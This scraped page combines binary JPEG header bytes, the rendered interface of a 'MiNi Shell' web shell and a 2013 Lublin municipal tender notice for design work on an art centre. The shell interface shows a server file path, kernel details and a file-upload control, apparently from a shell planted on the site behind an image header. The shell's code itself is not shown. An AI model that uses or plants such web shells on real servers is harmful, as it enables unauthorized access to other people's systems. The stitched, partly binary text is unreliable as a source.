JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130802/311212-N-2013.html

<p class="kh_header"><b>Lublin: Opracowanie kompletnej wielobranżowej dokumentacji na przebudowę oraz termomodernizację i zmianę sposobu użytkowania budynku dawnych warsztatów szkolnych usytuowanego przy ulicy Popiełuszki 5 w Lublinie na Centrum Sztuki Współczesnej oraz sprawowanie nadzorów autorskich nad realizacją inwestycji</b><br>
<b>Numer ogłoszenia: 311212 - 2013; data zamieszczenia: 02.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lublin , Pl. Króla Władysława Łokietka 1, 20-109 Lublin, woj. lubelskie, tel. 81 4663000, faks 81 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnej wielobranżowej dokumentacji na przebudowę oraz termomodernizację i zmianę sposobu użytkowania budynku dawnych warsztatów szkolnych usytuowanego przy ulicy Popiełuszki 5 w Lublinie na Centrum Sztuki Współczesnej oraz sprawowanie nadzorów autorskich nad realizacją inwestycji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje: 
1.1. prace przedprojektowe:
1.1.1. wykonanie badań geotechnicznych warunków posadowienia obiektów budowlanych w zakresie niezbędnym do opracowania projektu budowlanego,
1.1.2. wykonanie oceny stanu technicznego budynku w zakresie wynikającym z obowiązujących przepisów,
1.1.3. wykonanie inwentaryzacji obiektu do celów projektowych,
1.1.4. pozyskanie we własnym zakresie i na własny koszt mapy do celów projektowych w skali 1:500,
1.1.5. opracowanie audytu energetycznego (w 6 egz.);
1.2. prace projektowe:
1.2.1. opracowanie koncepcji przebudowy, oraz rozwiązań funkcjonalno - użytkowych zmiany sposobu użytkowania budynku dawnych warsztatów szkolnych usytuowanego przy ul. Popiełuszki 5 w Lublinie na Centrum Sztuki Współczesnej - Galeria Labirynt (w 4 egz.) na podstawie wstępnych wytycznych funkcjonalno - programowych,
1.2.2. opracowanie projektów techologicznych (po 4 egz.):
a) projektów technologicznych wyposażenia technicznego obiektu (nagłośnienie, akustyka, wizja, oświetlenie, system łączności inspicjenta i inne) wynikającego ze zmiany sposobu użytkowania i specyfiki obiektu oraz ze wstępnych wytycznych funkcjonalno - programowych, a także wymaganych obowiązującymi przepisami,
b) projektów aranżacji wnętrz,
1.2.3. opracowanie projektów budowlanych (po 6 egz.) i wykonawczych (po 4 egz.) na przebudowę w związku ze zmianą sposobu użytkowania budynku dawnych warsztatów szkolnych przy ul. Popiełuszki 5 w Lublinie na Centrum Sztuki Współczesnej, w zakresie wynikającym z konieczności dostosowania obiektu do obowiązujących przepisów p.poż., bhp, sanitarno - zdrowotnych, dostępności dla osób niepełnosprawnych i zmiany sposobu użytkowania, z uwzględnieniem rozwiązań specjalistycznych wynikających ze specyfiki nowego sposobu użytkowania obiektu, oraz z usunięciem ewentualnych kolizji, w oparciu o wstępne wytyczne funkcjonalno - programowe, zgodnie z decyzją o ustaleniu lokalizacji inwestycji celu publicznego oraz wytycznymi Miejskiego Konserwatora Zabytków, w zakresie niezbędnym dla realizacji inwestycji, we wszystkich branżach:
a) architektonicznej i konstrukcyjnej, w tym także w zakresie: docieplenia budynku, wymiany stolarki, dostosowania komunikacji poziomej i pionowej (klatki schodowe, windy) do obowiązujących przepisów (z uwzględnieniem planowanych przez ustawodawcę zmian dotyczących w szczególności warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie),
b) sanitarnej - w tym projekty branżowe w pełnym zakresie obejmujące także wymianę i wykonanie instalacji c. o. oraz wymiennikowni, wentylacji, klimatyzacji, instalacji wodno - kanalizacyjnej,
c) elektrycznej i teletechnicznej - w tym projekty branżowe w pełnym zakresie obejmujące także wymianę i wykonanie instalacji elektrycznej oraz instalacji niskoprądowej (m. in. monitoring i instalację antywłamaniową, SSP, komputerową, światłowodową) i inną niezbędną wynikającą z nowej funkcji budynku,    
d) drogowej,
1.2.4. opracowanie projektu zagospodarowania terenu we wszystkich branżach, obejmującego: zagospodarowanie i urządzenie terenu wokół obiektu (mała architektura, zieleń towarzysząca), obsługę komunikacyjną (miejsca postojowe, chodniki, elementy komunikacji wewnętrznej, droga pożarowa oraz zjazd), infrastrukturę techniczną (odwodnienie, oświetlenie, monitoring terenu, sieci i przyłącza oraz przebudowa uzbrojenia terenu w przypadku kolizji), rozbiórkę istniejących obiektów przeznaczonych do rozbiórki  i zasilenie energetyczne terenu budowy (po 6 egz.),
1.2.5. opracowanie projektów budowlanych (po 6 egz.) i wykonawczych (po 4 egz.) przebudowy w niezbędnym zakresie sieci i przyłączy: wodno - kanalizacyjnych, c.o., energetycznych , światłowodowych i innych wynikających z nowej funkcji budynku,
1.2.6. opracowanie projektu rozbiórki budynku Nr 2 (w 4 egz.),
1.2.7. opracowanie dokumentacji geotechnicznej (w 4 egz.),
1.2.8. opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych we wszystkich branżach (po 4 egz.),
1.2.9. opracowanie szczegółowych specyfikacji technicznych wyposażenia obiektu (po 4 egz.),
1.2.10. opracowanie przedmiarów robót we wszystkich branżach (po 3 egz.),
1.2.11. opracowanie kosztorysów inwestorskich we wszystkich branżach (po 3 egz.),
1.2.12. opracowanie wykazu scalonych elementów robót dla poszczególnych etapów realizacji robót budowlanych, z uwzględnieniem technologicznej kolejności ich realizacji oraz w sposób umożliwiający dokonywanie częściowych odbiorów robót i płatności częściowych za zakończone i odebrane elementy (etapy) robót budowlanych (po 3 egz.), 
1.2.13. opracowanie informacji BIOZ (w 4 egz.),
1.2.14. uzyskanie we własnym zakresie i i na własny koszt niezbędnych opinii, uzgodnień i zatwierdzeń projektów, w tym w szczególności w zakresie p. poż., bhp, sanitarno - zdrowotnych, wymaganych obowiązującymi w tej materii przepisami,
1.2.15. przygotowanie kompletnej dokumentacji wraz ze wszystkimi niezbędnymi uzgodnieniami w celu wystąpienia o decyzję o pozwoleniu na budowę, zgodnie z obowiązującymi w tej materii przepisami,
1.2.16. opracowanie na podstawie audytu energetycznego, dokumentacji dotyczącej termomodernizacji obiektu jako odrębnego i kompletnego wielobranżowego opracowania zawierającego także wydzielenie kosztów bezpośrednio związanych z termomodernizacją obiektu (dokumentacja - 6 egz., specyfikacje techniczne, kosztorysy, przedmiary - po 3 egz.);
1.3. pełnienie kompleksowych nadzorów autorskich nad realizacją robót budowlanych prowadzonych w oparciu o dokumentację stanowiącą  przedmiot zamówienia w zakresie obejmującym w szczególności: 
1.3.1. wykonywanie czynności nadzoru autorskiego wynikających z art. 20 ust. 1 pkt 4 ppkt. a) i b) ustawy  z dnia 7 lipca 1994 r. Prawo Budowlane (t .j.  Dz. U. z 2010 r. Nr 243, poz. 1623 z poźn. zm.),
1.3.2. dokonywanie wpisów do dziennika budowy zgodnie z art. 21 ustawy  z dnia 7 lipca 1994 r. Prawo Budowlane ( t .j.  Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) oraz zgodnie z § 9 ust. 1 i 2 Rozporządzenia Ministra Infrastruktury z dnia 26 czerwca 2002 r. w sprawie dziennika budowy, montażu i rozbiórki tablicy informacyjnej oraz ogłoszenia zawierającego dane dotyczące bezpieczeństwa pracy i ochrony zdrowia (Dz. U. z 2002 r., Nr 108, poz. 953 z późn. zm.),
1.3.3. wyjaśnianie wątpliwości dotyczących rozwiązań zawartych w dokumentacji projektowej pojawiających się w toku realizacji inwestycji,
1.3.4. uzupełnianie szczegółów dokumentacji projektowej, 
1.3.5. ścisłą współpracę ze wszystkimi uczestnikami procesu budowlanego, w szczególności w zakresie dotyczącym:
a) uzgodnienia możliwości wprowadzenia zmian w dokumentacji projektowej lub rozwiązań zamiennych,
b) wspomagania nadzoru inwestorskiego w zakresie kontroli (monitorowania) zgodności realizowanych robót budowlanych z dokumentacją projektową,
c) udziału w komisjach odbiorowych i naradach technicznych na budowie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę winien wnieść wadium przed upływem terminu składania ofert, w wysokości  15 000 zł (słownie:  piętnaście tysięcy  złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą wykonanie minimum 2 projektów budowlano- wykonawczych dotyczących budowy lub przebudowy budynków użyteczności publicznej o kubaturze co najmniej  10 000,00 m3 w okresie ostatnich trzech lat przez upływem terminu składania oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą dysponowanie osobą/ami posiadającą/ymi odpowiednie uprawnienia budowlane do projektowania w specjalności:
- architektonicznej;
- konstrukcyjno - budowlanej;
- drogowej;
- telekomunikacyjnej;
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych;
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
podstawa prawna art. 14 ustawy Prawo budowlane z dnia 7 lipca 1994 r. (tekst jednolity Dz. U. z 2010 r. Nr 243, poz. 1623 ze zmianami).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>1.Wykaz winien wskazywać wykonanie usług  polegających na wykonaniu projektów budowlano- wykonawczych dotyczących budowy lub przebudowy budynków użyteczności publicznej o kubaturze co najmniej 10 000,00 m3 w okresie ostatnich trzech lat przez upływem terminu składania oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
2.Złożone poświadczenia winny potwierdzać należyte wykonanie   usług polegających na wykonaniu projektów budowlano- wykonawczych dotyczących budowy lub przebudowy budynków użyteczności publicznej o kubaturze co najmniej 10 000,00 m3 w okresie ostatnich trzech lat przez upływem terminu składania oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2. Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 3. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 4. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy lub wykonawca - w przypadku osób fizycznych. 5. W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 6. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują następujące rodzaje i warunki zmiany treści umowy: 
1) zmniejszenie zakresu przedmiotu umowy, gdy wykonanie pierwotnego zakresu nie leży w interesie publicznym z jednoczesnym proporcjonalnym zmniejszeniem wynagrodzenia oraz w razie potrzeby, ze zmianą terminu realizacji przedmiotu umowy,
2) zmianę  terminu realizacji  przedmiotu umowy, w przypadku:
a) działania siły wyższej, uniemożliwiającej wykonanie umowy w terminie,
b)wystąpienia niezależnego od Wykonawcy przedłużania się pozyskiwania uzgodnień, sprawdzeń i warunków do projektowania od dysponentów mediów, ZUDP i innych właściwych organów czy instytucji oraz przedłużania się pozyskiwania wszelkich decyzji, opinii, niezbędnych do otrzymania koniecznych uzgodnień i pozwolenia na budowę,     
c) realizacji w drodze odrębnej umowy  prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,
d) konieczności zmniejszenia zakresu przedmiotu umowy, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie publicznym, 
e) gdy zachowanie pierwotnego terminu nie leży w interesie publicznym,
f) przekroczenia terminów określonych w umowie, z winy Zamawiającego;
3) powierzenie Podwykonawcy określonego zakresu prac na skutek którejkolwiek z okoliczności wskazanych w pkt. 2 lit. a-c oraz lit. e - f;
4) zmianę stawki i kwoty podatku VAT oraz zmianę kwoty wynagrodzenia brutto.
2.Zmiany umowy przewidziane w pkt. 1 dopuszczalne są na następujących warunkach:
- ad pkt. 1 ppkt. 1 - zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu publicznego z jednoczesnym proporcjonalnym do zmniejszonego zakresu zamówienia (do wartości zaniechanych prac projektowych i nadzorów), zmniejszeniem wynagrodzenia określonego kwotą ryczałtową ; wysokość ostatecznego, zmniejszonego wynagrodzenia zostanie ustalona na podstawie wyliczenia procentowego udziału zmniejszonego zakresu zamówienia w pierwotnie przyjętym zakresie, co zostanie potwierdzone przez obie Strony umowy stosownym protokołem;     
- ad pkt. 1 ppkt. 2 - zmiana terminu realizacji przedmiotu umowy nastąpi:
lit. a) o okres niezbędny do usunięcia skutków działania siły wyższej,
lit. b) o najdłuższy okres czasu przez jaki okoliczności te wystąpiły, powyżej 10 dni roboczych,
lit. c) o okres czasu niezbędny do wykonania prac powiązanych z przedmiotem  niniejszej umowy, realizowanych w drodze odrębnej umowy,
lit. d) o okres niezbędny do wykonania pozostałego zakresu zamówienia (proporcjonalnie do zmniejszonego zakresu),
lit. e) o okres umożliwiający Zamawiającemu osiągnięcie korzyści, stanowiących podstawę zmiany terminu realizacji, 
lit. f)  o najdłuższy okres czasu przez jaki okoliczności te wystąpiły.
- ad pkt. 1 ppkt. 3 - powierzenie Podwykonawcy określonego zakresu prac nastąpi z jednoczesną zmianą (rozszerzeniem) postanowień umowy poprzez wprowadzenie do niego stosownych zapisów dotyczących udziału Podwykonawcy w realizacji przedmiotu umowy;
- ad pkt. 1 ppkt. 4 -  stawka i kwota podatku VAT oraz wynagrodzenie brutto, ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Pl.Litewski 1, pok.nr 3, po dokonaniu wpłaty 13,00 zł w budynku UM przy ul. Wieniawskiej 14 lub za zaliczeniem pocztowym ( 13,00 zł + koszt przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 13:30, miejsce: Biuro Zamówień Publicznych Urzędu Miasta Lublin, Plac Litewski 1, 20-080 Lublin, pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Osobami upoważnionymi do kontaktowania się z wykonawcami są:
1.1.W zakresie przedmiotu zamówienia: p. Anna Lalka - Wydział Iwestycji i Remontów Urzędu Miasta Lublin, ul.Podwale 3, telefon 81 466 24 22.
1.2.W zakresie procedury: p. Katarzyna Podkańska-Dziubińska - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3, telefon 81 466 30 14.
2. Termin wykonania zamówienia: 4 lata od dnia zawarcia umowy, w tym:
a) prace przedprojektowe - 2 miesiące od daty zawarcia umowy
b) koncepcja - 1 miesiąc od daty zawarcia umowy
c) pozostały zakres dotyczący prac projektowych - do dnia 15 listopada 2013 r.
d) pełnienie kompleksowych nadzorów autorskich  - od dnia zawarcia umowy z Wykonawcą robót budowlanych realizowanych w oparciu o dokumentację projektową stanowiącą przedmiot zamówienia, do dnia  podpisania protokołu odbioru końcowego tych robót, jednak nie dłużej niż do upływu 4 lat od dnia zawarcia umowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com